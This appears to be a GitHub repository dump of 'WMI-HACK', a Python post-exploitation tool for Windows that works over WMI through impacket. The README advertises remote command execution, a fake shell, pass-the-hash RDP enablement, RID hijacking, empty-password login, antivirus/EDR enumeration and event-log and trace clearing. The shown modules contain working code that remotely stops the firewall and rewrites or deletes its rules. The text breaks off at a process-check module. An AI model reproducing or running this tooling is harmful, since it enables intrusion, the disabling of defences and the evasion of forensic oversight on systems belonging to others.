├── README.md ├── img ├── 360_av.png ├── AV_EDR_QUERY.png ├── Disable_pth_rdp_login.png ├── Enable_User.png ├── Enable_Winrm.png ├── Enable_pth_rdp_login.png ├── Enable_rdp.png ├── RDP_disable.png ├── Users_query.png ├── check2.png ├── check3.png ├── check_firewall.png ├── cleartrace.png ├── delete_file.png ├── disable_firewall_rule.png ├── enable_firewall_role.png ├── fake_shell.png ├── fake_shell2.png ├── firewall_query.png ├── get_process.png ├── ls_path.png ├── query1a.png ├── query3.png ├── query_all_firewall_rule.png ├── query_disable_firewall_rule.png ├── query_enable_firewall_rule.png ├── query_enable_inbound_firewall_rule.png ├── query_enable_outbound_firewall_rule.png ├── rdp_shadow.png ├── readfile.png ├── rid_hijack.gif ├── stop_FIrewall.png ├── stop_winrm.png ├── winrm_firewall.png ├── write_file.png └── write_file2.png ├── module ├── FirewallRule_setting.py ├── Firewall_setting.py ├── __init__.py ├── check.py ├── checkError.py ├── clearEventLog.py ├── cleartrace.py ├── cmdrun.py ├── cmdrun2.py ├── dumpLsass.py ├── enable_pth_login_rdp.py ├── files.py ├── getProcessList.py ├── listdir.py ├── printReply.py ├── rdpsetting.py ├── ridhijack.py ├── userquery.py ├── vbsrun.py ├── winrm_enable.py └── wmiconnect.py ├── output ├── clearEventLog.vbs ├── dele_file.vbs ├── delete_file.vbs ├── exec2_command.vbs ├── exec_command_read.vbs ├── listdir.vbs ├── readfile.vbs ├── reg_permission.vbs └── writeFile.vbs ├── vbs ├── clearEventLog.vbs ├── cleartrace.vbs ├── dele_file.vbs ├── delete_file.vbs ├── exec2_command.vbs ├── exec_command_read.vbs ├── listdir.vbs ├── readfile.vbs ├── reg_permission.vbs ├── regini.vbs └── writeFile.vbs └── wmi_query.py /README.md: -------------------------------------------------------------------------------- 1 | # WMI-HACK ## 2 | 3 | ## 更新 ## 4 | * 基本功能实现 5 | * 通过base64编码传入vbs,vbs base64解码避免中文或者其他语言造成latin-1编码问题 6 | * 更新RID劫持/用户启用或者禁用 7 | * 执行过程清除 8 | 9 | ## 其他 ## 10 | 1. 纯属写来练手,感谢离爹提供的帮助,推荐小离的项目:https://github.com/XiaoliChan/wmiexec-Pro 11 | 2. vbs代码大量来源于网上 12 | 13 | ## 需求 ## 14 | python3 15 | impacket模块 16 | ```text 17 | pip3 install impacket 18 | ``` 19 | 20 | ## 项目架构 ## 21 | ```text 22 | ├───img 23 | ├───module #模块 24 | ├───output #vbs调用产生的临时vbs文件夹 25 | ├───vbs #模块所使用的vbs模板 26 | wmi_query.py 27 | ``` 28 | 29 | ## 功能 ### 30 | * 获取进程列表 31 | * 远程请求查询进程列表站点对比进程 32 | * 用户名查询 33 | * RDP开启/关闭 34 | * PTH RDP登录开启/关闭 35 | * winrm服务开启/关闭 36 | * 防火墙规则查询 37 | * 启用的防火墙规则查询 38 | * 禁用的防火墙规则查询 39 | * 允许入站的防火墙规则查询 40 | * 禁止入站的防火墙规则连接 41 | * 启用允许入站的防火墙规则查询 42 | * 禁用防火墙入站的防火墙规则查询 43 | * 开启/关闭某条防火墙规则 44 | * 防火墙查询/关闭/开启 45 | * 运行vbs 46 | * 只运行一次vbs 47 | * 日志清除 48 | * 通过Win32_ScheduledJob命令执行 (适用于NT 6.0或以下) 49 | * 通过vbs创建计划任务执行命令 (适用于NT 6.0以上) 50 | * 伪造的交互shell 51 | * 文件写入/文件读取/文件删除 52 | * 文件夹查询 53 | * 空密码登录启用 54 | * 用户RID查询 55 | * RID劫持 56 | * 执行过程清除 57 | 58 | ```text 59 | Usage: 60 | python wmi_query -i -u -p -g #Get Process List 61 | python wmi_query -i -u -p -g -q #query Av/EDR/Process 62 | python wmi_query -i -u -p -U #User Query 63 | python wmi_query -i -u -p -R 1 #Enable rdp 64 | python wmi_query -i -u -p -R 0 #Disable rdp 65 | python wmi_query -i -u -p -R 2 #Query rdp Port 66 | python wmi_query -i -u -p -E 1 #Enable PTH rdp 67 | python wmi_query -i -u -p -E 0 #Disable PTH rdp 68 | python wmi_query -i -u -p -W 1 #Enable winrm service 69 | python wmi_query -i -u -p -F query # query all Firewall rule 70 | python wmi_query -i -u -p -F query1 #query Enable Firewall rule 71 | python wmi_query -i -u -p -F query2 #query Disable Firewall rule 72 | python wmi_query -i -u -p -F querya #query inbound Firewall rule 73 | python wmi_query -i -u -p -F queryb #query outbound Firewall rule 74 | python wmi_query -i -u -p -F query1a #query Enable inbound Firewall rule 75 | python wmi_query -i -u -p -F query2a #query Disable inbound Firewall rule 76 | python wmi_query -i -u -p -F query1b #query Enable outbound Firewall rule 77 | python wmi_query -i -u -p -F query2b #query Disable outbound Firewall rule 78 | python wmi_query -i -u -p -F query3 #query InstanceID Firewall rule 79 | python wmi_query -i -u -p -F delete #delete InstanceID Firewall rule 80 | python wmi_query -i -u -p -F disable #Disable a firewall rule 81 | python wmi_query -i -u -p -F enable #Enable a firewall rule 82 | python wmi_query -i -u -p -f query #query Firewall 83 | python wmi_query -i -u -p -f stop #stop Firewall 84 | python wmi_query -i -u -p -F start #start Firewall 85 | python wmi_query -i -u -p -V #(vbs_id:Example) Run Vbs (The vbs is run repeatedly at intervals of 2 seconds, and the --stop_vbs parameter must be used to stop) 86 | python wmi_query -i -u -p --stop_vbs /--stop_vbs 1 #-- stop 1 stop default(vbsid:Example) vbs running on repeat/stop use --stop 87 | python wmi_query -i -u -p --one_vbs #vbs that only runs once 88 | python wmi_query -i -u -p --execute_command #To execute the command through Win32_ScheduledJob (NT 6.0), you need to wait for 1 minute 89 | python wmi_query -i -u -p --clear_eventlog #cear eventlog logName:appllication,system,setup,forwardedevents,security 90 | python wmi_query -i -u -p --clear_eventlog --cycle_clear# This will execute clear EventLog vbs forever(To stop use --stop ) 91 | python wmi_query -i -u -p --execute_command2 #execute command 92 | python wmi_query -i -u -p --shell #Command execution mode 2 to get a fake shell 93 | python wmi_query -i -u -p --writefile --save-to-file # remote file writing 94 | python wmi_query -i -u -p --readfile --save-to-file # remote file reading 95 | python wmi_query -i -u -p --ls #Query files and folders of a certain path 96 | python wmi_query -i -u -p --rdp-shadow #Rdp Shadow Setting 97 | python wmi_query -i -u -p --nulllogin 0 #Enable null password login 98 | python wmi_query -i -u -p --nulllogin 0 #Disable null password login 99 | python wmi_query -i -u -p --user-rid-query #Users RID Query 100 | python wmi_query -i -u -p --ridhijack 1f5(src_id),1f4(target_rid) #Rid Hijack Example 101 | python wmi_query -i -u -p --set-user ,0 #Disable User 102 | python wmi_query -i -u -p --set-user ,1 #Enable User 103 | python wmi_query -i -u -p --cleartrace #Clear usage traces,On cycle clearEventLog Security 104 | Usage: wmi_query.py [options] 105 | 106 | Options: 107 | -h, --help show this help message and exit 108 | -i IP target IP 109 | -u USERNAME auth username 110 | -d DOMAIN target domain 111 | -p PASSWORD auth password 112 | -n NTLM auth ntlm/lm 113 | -g get process list 114 | -q query Av/EDR/Process 115 | -U user list query 116 | -R ENABLE_RDP enable rdp/disable rdp 117 | -E ENABLE_PTH enable rdp pth login 118 | -W ENABLE_WINRM enable winrm service 119 | -F NETFIREWALLRULE Query/Enable/Disable NetFirewallRule 120 | -f FIREWALL Start/Stop firewall 121 | -V VBS Run vbs 122 | --stop_vbs=STOP_VBS stop Default vbs Runing or Stop the id of vbs running 123 | --one_vbs_run=ONE_VBS_RUN 124 | vbs that only runs once 125 | --execute_command=EXECUTE_COMMAND 126 | execute command (NT 6.0) 127 | --execute_command2=EXECUTE_COMMAND2 128 | execute command 129 | --clear_eventlog=CLEAR_EVENTLOG 130 | clear event log 131 | --cycle_clear cycle clear eventlog 132 | --shell fake shell 133 | --writefile=WRITEFILE 134 | write file 135 | --readfile=READFILE read file 136 | --save-to-file=OUTFILE 137 | write file save as path 138 | --ls=LSDIR Query files and folders of a certain path 139 | --dele-file=DELETEFILE 140 | remove file 141 | --rdp-shadow=RDPSHADOW 142 | rdp shadow setting (-1-Delete Shadow reg key,0-No 143 | remote control allowed,1-Full Control with User 144 | Rights,2-Full control without user permission,3-View 145 | sessions with user permissions,4-View conversations 146 | without user permission) 147 | --nulllogin=NONELOGIN 148 | Login with empty password 149 | --user-rid-query Users RID Query 150 | --ridhijack=RDIHIJACK 151 | RID hijack (--ridhijack 152 | ,) 153 | --set-user=SETUSER Enable/Disable User(--setuser ,1/0) 154 | --cleartrace Clear usage traces 155 | 156 | ``` 157 | 158 | ## get process list ## 159 | ![](img/get_process.png) 160 | 161 | ## Query Antivirus/EDR ## 162 | ![](img/AV_EDR_QUERY.png) 163 | 164 | ## Users Query ## 165 | ![](img/Users_query.png) 166 | 167 | ## Enable/Disable Rdp ## 168 | Disable RDP 169 | ![](img/RDP_disable.png) 170 | 171 | Enable RDP 172 | ![](img/Enable_rdp.png) 173 | 174 | 175 | ## Enable/Disable PTH rdp ## 176 | ![](img/Enable_pth_rdp_login.png) 177 | 178 | **Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace 179 | Unable to configure firewall rules** 180 | 181 | ![](img/Disable_pth_rdp_login.png) 182 | 183 | ## Enable/Disable winrm Service ## 184 | ![](img/Enable_Winrm.png) 185 | 186 | the Firewall Name set spance 187 | ![](img/winrm_firewall.png) 188 | 189 | ![](img/stop_winrm.png) 190 | 191 | ## Firewall rule setting ## 192 | query all Firewall rule 193 | ![](img/query_all_firewall_rule.png) 194 | 195 | query Enable Firewall rule 196 | ![](img/query_enable_firewall_rule.png) 197 | 198 | query Disable Firewall rule 199 | ![](img/query_disable_firewall_rule.png) 200 | 201 | query inbound Firewall rule 202 | ![](img/query_enable_inbound_firewall_rule.png) 203 | 204 | query outbound Firewall rule 205 | ![](img/query_enable_outbound_firewall_rule.png) 206 | 207 | query Enable inbound Firewall rule 208 | ![](img/query1a.png) 209 | 210 | ........... 211 | 212 | query InstanceID Firewall rule 213 | ![](img/query3.png) 214 | 215 | enable/disable Firewall rule 216 | ![](img/disable_firewall_rule.png) 217 | 218 | ![](img/check_firewall.png) 219 | 220 | ![](img/enable_firewall_role.png) 221 | 222 | ![](img/check2.png) 223 | 224 | ## Firewall setting ## 225 | ![](img/firewall_query.png) 226 | 227 | start/stop Firewall 228 | ![](img/stop_FIrewall.png) 229 | 230 | ![](img/check3.png) 231 | 232 | ## fake shell ## 233 | ![](img/fake_shell.png) 234 | 235 | ![](img/fake_shell2.png) 236 | 237 | ## write file ## 238 | ![](img/write_file.png) 239 | 240 | ![](img/write_file2.png) 241 | 242 | ## read file ## 243 | ![](img/readfile.png) 244 | 245 | ## ls file path ## 246 | ![](img/ls_path.png) 247 | 248 | ## RDP shadow ## 249 | ![](img/rdp_shadow.png) 250 | 251 | ## User Enable/User Ridsable ## 252 | ![](img/Enable_User.png) 253 | 254 | ## RID Hijack ## 255 | 使用 256 | 1.启用空密码登录 257 | ```text 258 | python wmi_query -i -u -p --nulllogin 0 #Enable null password login 259 | ``` 260 | 2.用户RID查询 261 | ```text 262 | python wmi_query -i -u -p --user-rid-query 263 | ``` 264 | 3.RID劫持 265 | ```text 266 | python wmi_query -i -u -p --ridhijack 1f5(src_id),1f4(target_rid) 267 | ``` 268 | ![](img/rid_hijack.gif) 269 | 270 | PS: 271 | RID劫持和启用用户/禁用用户会被某些杀毒拦截,使用时自行注意 272 | ![](img/360_av.png) 273 | 274 | ## cleartrace ## 275 | 清除残留在`ROOT\subscription:ActiveScriptEventConsumer`下的UID和C:\Windows\Temp下命令执行 276 | 或者异常留下的txt,循环清除windows Security日志 277 | ![](img/cleartrace.png) -------------------------------------------------------------------------------- /img/360_av.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/360_av.png -------------------------------------------------------------------------------- /img/AV_EDR_QUERY.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/AV_EDR_QUERY.png -------------------------------------------------------------------------------- /img/Disable_pth_rdp_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Disable_pth_rdp_login.png -------------------------------------------------------------------------------- /img/Enable_User.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_User.png -------------------------------------------------------------------------------- /img/Enable_Winrm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_Winrm.png -------------------------------------------------------------------------------- /img/Enable_pth_rdp_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_pth_rdp_login.png -------------------------------------------------------------------------------- /img/Enable_rdp.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Enable_rdp.png -------------------------------------------------------------------------------- /img/RDP_disable.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/RDP_disable.png -------------------------------------------------------------------------------- /img/Users_query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/Users_query.png -------------------------------------------------------------------------------- /img/check2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/check2.png -------------------------------------------------------------------------------- /img/check3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/check3.png -------------------------------------------------------------------------------- /img/check_firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/check_firewall.png -------------------------------------------------------------------------------- /img/cleartrace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/cleartrace.png -------------------------------------------------------------------------------- /img/delete_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/delete_file.png -------------------------------------------------------------------------------- /img/disable_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/disable_firewall_rule.png -------------------------------------------------------------------------------- /img/enable_firewall_role.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/enable_firewall_role.png -------------------------------------------------------------------------------- /img/fake_shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/fake_shell.png -------------------------------------------------------------------------------- /img/fake_shell2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/fake_shell2.png -------------------------------------------------------------------------------- /img/firewall_query.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/firewall_query.png -------------------------------------------------------------------------------- /img/get_process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/get_process.png -------------------------------------------------------------------------------- /img/ls_path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/ls_path.png -------------------------------------------------------------------------------- /img/query1a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query1a.png -------------------------------------------------------------------------------- /img/query3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query3.png -------------------------------------------------------------------------------- /img/query_all_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_all_firewall_rule.png -------------------------------------------------------------------------------- /img/query_disable_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_disable_firewall_rule.png -------------------------------------------------------------------------------- /img/query_enable_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_enable_firewall_rule.png -------------------------------------------------------------------------------- /img/query_enable_inbound_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_enable_inbound_firewall_rule.png -------------------------------------------------------------------------------- /img/query_enable_outbound_firewall_rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/query_enable_outbound_firewall_rule.png -------------------------------------------------------------------------------- /img/rdp_shadow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/rdp_shadow.png -------------------------------------------------------------------------------- /img/readfile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/readfile.png -------------------------------------------------------------------------------- /img/rid_hijack.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/rid_hijack.gif -------------------------------------------------------------------------------- /img/stop_FIrewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/stop_FIrewall.png -------------------------------------------------------------------------------- /img/stop_winrm.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/stop_winrm.png -------------------------------------------------------------------------------- /img/winrm_firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/winrm_firewall.png -------------------------------------------------------------------------------- /img/write_file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/write_file.png -------------------------------------------------------------------------------- /img/write_file2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/wmi-hack-py/21415b1fbb60f358d6e3a6dc20a22662233d741b/img/write_file2.png -------------------------------------------------------------------------------- /module/FirewallRule_setting.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | import colorama 4 | 5 | def FirewallRule_setting(ip='', username='', password='',domain='',hashes='',aesKey='',arg=""): 6 | if arg[0:5]!="query" and arg!="enable" and arg!="disable" and arg!="delete": 7 | print("[-] Pluse Query Help,Thanks....") 8 | exit() 9 | 10 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 11 | try: 12 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/StandardCimv2', NULL, NULL) 13 | except Exception as error: 14 | if "WBEM_E_INVALID_NAMESPACE" in str(error): 15 | print("[*] The OS possible:Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace\nUnable to configure firewall rules") 16 | dcom.disconnect() 17 | exit() 18 | if arg == "query1": #查启用 19 | wql="select * from MSFT_NetFirewallRule where Enabled=1" 20 | print("[*] Select Enable Firewall Rule") 21 | if arg == "query2": #查禁用 22 | wql="select * from MSFT_NetFirewallRule where Enabled=2" 23 | print("[*] Select Disable Firewall Rule") 24 | if arg == "query": #查全部 25 | wql="select * from MSFT_NetFirewallRule" 26 | print("[*] Select all Firewall Rule") 27 | if arg=="querya": #查入站 28 | wql="select * from MSFT_NetFirewallRule where Direction=1" 29 | print("[*] Select inbound Firewall Rule") 30 | elif arg=="queryb": #查出站 31 | wql="select * from MSFT_NetFirewallRule where Direction=2" 32 | print("[*] Select outbound Firewall Rule") 33 | elif arg=="query1a": #查启用的入站 34 | wql = "select * from MSFT_NetFirewallRule where Direction=1 and Enabled=1" 35 | print("[*] Select Enable inbound Firewall Rule") 36 | elif arg=="query2a": #查禁用的入站 37 | wql = "select * from MSFT_NetFirewallRule where Direction=1 and Enabled=2" 38 | print("[*] Select Disable inbound Firewall Rule") 39 | elif arg=="query1b": #查启用的出站 40 | wql = "select * from MSFT_NetFirewallRule where Direction=2 and Enabled=1" 41 | print("[*] Select Enable outbound Firewall Rule") 42 | elif arg=="query2b": #查禁用的出站 43 | wql = "select * from MSFT_NetFirewallRule where Direction=2 and Enabled=2" 44 | print("[*] Select Disable outbound Firewall Rule") 45 | elif arg=="query3": #特定ID查询 46 | user=input("InstanceID:") 47 | wql="select * from MSFT_NetFirewallRule where InstanceID=\"{}\"".format(user) 48 | print("[*] Select InstanceID Query") 49 | 50 | 51 | wql2 = "select * from MSFT_NetFirewallRule where InstanceID=" 52 | if "query" in arg: 53 | MSFT_NetFirewallRule = iWbemServices.ExecQuery(wql) 54 | while True: 55 | try: 56 | pEnum = MSFT_NetFirewallRule.Next(0xffffffff, 1)[0] 57 | action=int(pEnum.Action) 58 | Description=pEnum.Description 59 | DisplayName=pEnum.DisplayName 60 | ElementName=pEnum.ElementName 61 | InstanceID=pEnum.InstanceID 62 | Enabled=int(pEnum.Enabled) 63 | if action==4: 64 | type_="block connection" 65 | elif action==2: 66 | type_="allow connection" 67 | if Enabled==1: 68 | color=colorama.Fore.GREEN 69 | enable_status=True 70 | else: 71 | color=colorama.Fore.RED 72 | enable_status=False 73 | MSFT_NetProtocolPortFilter=iWbemServices.ExecQuery("select * from MSFT_NetProtocolPortFilter where InstanceID=\"{}\"".format(InstanceID)).Next(0xffffffff, 1)[0] 74 | MSFT_NetProtocolPortFilter_LocalPort=MSFT_NetProtocolPortFilter.LocalPort 75 | MSFT_NetProtocolPortFilter_RemotePort=MSFT_NetProtocolPortFilter.RemotePort 76 | MSFT_NetProtocolPortFilter_Protocol=MSFT_NetProtocolPortFilter.Protocol 77 | output=color+"Type:{} {} {} {} InstanceID:{} Enable:{} || Protocol:{} LocalPort:{} RemotePort:{}".format(type_,Description,DisplayName,ElementName,InstanceID,enable_status,MSFT_NetProtocolPortFilter_Protocol,MSFT_NetProtocolPortFilter_LocalPort,MSFT_NetProtocolPortFilter_RemotePort)+colorama.Style.RESET_ALL 78 | print(output) 79 | except Exception as error: 80 | if "WBEM_S_FALSE" in str(error): 81 | break 82 | else: 83 | pass 84 | elif arg=="disable" or arg=="enable": #禁用防火墙某条规则 85 | print("[*] {} FirewallRule".format(arg)) 86 | InstanceID=input("Input {} InstanceID:".format(arg)) 87 | if arg=="disable": 88 | status=2 89 | elif arg=="enable": 90 | status=1 91 | wql2+='"{}"'.format(InstanceID) 92 | print(wql2) 93 | # 不能直接调用Disable方法,无法调用成功。只能强制覆盖 94 | ''' 95 | disable = iWbemServices.ExecQuery(wql2) 96 | pEnum = disable.Next(0xffffffff, 1)[0] 97 | print(pEnum.Disable) 98 | ''' 99 | try: 100 | iEnumWbemClassObject = iWbemServices.ExecQuery(wql2) 101 | firewall_RuleClass = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 102 | # firewall_RuleClass.Enable 103 | record = firewall_RuleClass.getProperties() 104 | record = dict(record) 105 | firewall_Instance = firewall_RuleClass.SpawnInstance() 106 | firewall_Instance.Enabled = status 107 | firewall_Instance.CreationClassName = "fuckyouaasasasaasas" 108 | firewall_Instance.PolicyRuleName = "" 109 | firewall_Instance.SystemCreationClassName = "" 110 | firewall_Instance.SystemName = "" 111 | # allow=2, allowBypass=3, Block=4 112 | firewall_Instance.Action = 2 113 | firewall_Instance.Caption = "" 114 | firewall_Instance.CommonName = "" 115 | firewall_Instance.ConditionListType = 3 116 | firewall_Instance.Description = "" 117 | firewall_Instance.Direction = 1 118 | firewall_Instance.DisplayGroup = "" 119 | firewall_Instance.DisplayName = "AAAAAAAAAAAAAAA" 120 | firewall_Instance.EdgeTraversalPolicy = 0 121 | firewall_Instance.ElementName = " " 122 | firewall_Instance.EnforcementStatus = [0] 123 | firewall_Instance.ExecutionStrategy = 2 124 | firewall_Instance.LocalOnlyMapping = False 125 | firewall_Instance.LooseSourceMapping = False 126 | firewall_Instance.Mandatory = "" 127 | firewall_Instance.Owner = "" 128 | firewall_Instance.PolicyDecisionStrategy = 2 129 | firewall_Instance.PolicyKeywords = "" 130 | firewall_Instance.PolicyRoles = "" 131 | firewall_Instance.PolicyStoreSource = "PersistentStore" 132 | firewall_Instance.PolicyStoreSourceType = 1 133 | firewall_Instance.PrimaryStatus = 1 134 | firewall_Instance.Profiles = 0 135 | firewall_Instance.RuleGroup = "" 136 | firewall_Instance.RuleUsage = "" 137 | firewall_Instance.SequencedActions = 3 138 | firewall_Instance.Status = "The rule was parsed successfully from the store." 139 | firewall_Instance.StatusCode = 65536 140 | print(iWbemServices.PutInstance(firewall_Instance.marshalMe())) 141 | except Exception as error: 142 | if str(error).find("S_FALSE")>0: 143 | print("[-] Not Found InstanceID:{} Firewall a Roule".format(InstanceID)) 144 | 145 | elif arg=="delete": 146 | ID=input("Delete Firewall InstanceID:") 147 | try: 148 | iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM MSFT_NetFirewallRule where InstanceID = \"%s\"" % ID) 149 | firewall_RuleClass = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 150 | record = dict(firewall_RuleClass.getProperties()) 151 | print(iWbemServices.DeleteInstance('MSFT_NetFirewallRule.CreationClassName="{}",PolicyRuleName="{}",SystemCreationClassName="{}",SystemName="{}"'.format(record['CreationClassName']['value'],record['PolicyRuleName']['value'],record['SystemCreationClassName']['value'],record['SystemName']['value']))) 152 | except Exception as error: 153 | if str(error).find("S_FALSE")>0: 154 | print("[-] Not Found InstanceID:{} Firewall a Roule".format(ID)) 155 | dcom.disconnect() -------------------------------------------------------------------------------- /module/Firewall_setting.py: -------------------------------------------------------------------------------- 1 | from module import * 2 | from module import wmiconnect 3 | 4 | def Firewall_setting(ip='', username='', password='',domain='',hashes='',aesKey='',arg=""): 5 | if arg[0:5] != "query" and arg != "start" and arg != "stop": 6 | print("[-] Pluse Query Help,Thanks....") 7 | exit() 8 | 9 | 10 | dcom, iWbemLevel1Login = wmiconnect.wmiconnect(ip, username, password, domain, hashes, aesKey) 11 | try: 12 | iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/StandardCimv2', NULL, NULL) 13 | except Exception as error: 14 | if "WBEM_E_INVALID_NAMESPACE" in str(error): 15 | print( 16 | "[*] The OS possible:Windows7/Windows Server 2008,Not Found //./root/StandardCimv2 NameSpace\nUnable to configure firewall rules") 17 | dcom.disconnect() 18 | exit() 19 | WQL="SELECT * FROM MSFT_NetFirewallProfile" 20 | if "query"==arg: 21 | firewall_list=iWbemServices.ExecQuery(WQL) 22 | while True: 23 | try: 24 | pEnum = firewall_list.Next(0xffffffff, 1)[0] 25 | InstanceID=pEnum.InstanceID 26 | Name=pEnum.Name 27 | EnableID=pEnum.Enabled 28 | if int(EnableID)==1 or int(EnableID)==2: 29 | status="ON" 30 | else: 31 | status="OFF" 32 | print("InstanceID:{} Name:{} EnableID:{}".format(InstanceID,Name,status)) 33 | except Exception as error: 34 | if "WBEM_S_FALSE" in str(error): 35 | break 36 | elif "stop"==arg or "start"==arg: 37 | print("[*] {} Firewall".format(arg)) 38 | if arg=="start": 39 | status=2 40 | elif arg=="stop": 41 | status=0 42 | user=input("Firewall Name:") 43 | WQL+=" where Name=\"{}\"".format(user) 44 | iEnumWbemClassObject = iWbemServices.ExecQuery(WQL) 45 | firewall_ProfileClass = iEnumWbemClassObject.Next(0xffffffff, 1)[0] 46 | record = firewall_ProfileClass.getProperties() 47 | record = dict(record) 48 | firewall_ProfileInstance = firewall_ProfileClass.SpawnInstance() 49 | firewall_ProfileInstance.DisabledInterfaceAliases = "" 50 | firewall_ProfileInstance.Caption = "" if record['Caption']['value'] == None else record['Caption']['value'] 51 | firewall_ProfileInstance.Enabled = status 52 | firewall_ProfileInstance.Description = "" if record['Caption']['value'] == None else record['Caption']['value'] 53 | iWbemServices.PutInstance(firewall_ProfileInstance.marshalMe()) 54 | dcom.disconnect() -------------------------------------------------------------------------------- /module/__init__.py: -------------------------------------------------------------------------------- 1 | from impacket.dcerpc.v5.dcom import wmi 2 | from impacket.dcerpc.v5.dcom.wmi import IWbemServices 3 | from impacket.dcerpc.v5.dcomrt import DCOMConnection 4 | from impacket.dcerpc.v5.dtypes import NULL 5 | from impacket.structure import Structure 6 | from impacket.smbconnection import SMBConnection, SMB_DIALECT, SMB2_DIALECT_002, SMB2_DIALECT_21 7 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY -------------------------------------------------------------------------------- /module/check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib.parse 3 | import sys 4 | import os 5 | import re 6 | from bs4 import BeautifulSoup 7 | 8 | def process_check(processlist): 9 | 